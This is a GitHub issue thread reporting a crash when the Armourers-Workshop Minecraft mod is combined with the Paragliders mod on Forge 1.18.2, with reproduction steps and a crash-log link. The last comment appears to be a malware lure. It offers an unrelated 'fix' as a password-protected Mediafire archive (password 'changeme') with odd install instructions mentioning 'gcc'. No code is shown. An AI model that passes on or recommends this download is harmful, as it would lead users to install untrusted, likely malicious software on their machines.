### ISSUE TITLE
[CRASH] Crash with paraglider mod.

### ISSUE THREAD

**Issue by ewahn** [RiskyKen/Armourers-Workshop#478]
**To Reproduce**
Steps to reproduce the crash:
1. Go to 'https://www.curseforge.com/minecraft/mc-mods/paragliders/files/4478246' and download
2. Launch forge 1.18.2 with both mods
3. Equip an outfit or piece of custom and either deku leaf or paraglider and jump from at least one block high with paraglider or deku leaf in hand to use the item.
4. See crash

**Crash log**
https://pastebin.com/EAR7NXDU

**Additional context**
When using the armour hider your armour becomes visible when using paraglider but doesn't crash.

**Comment by ewahn** [comment]
https://pastebin.com/EAR7NXDU wrong crash log linked

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
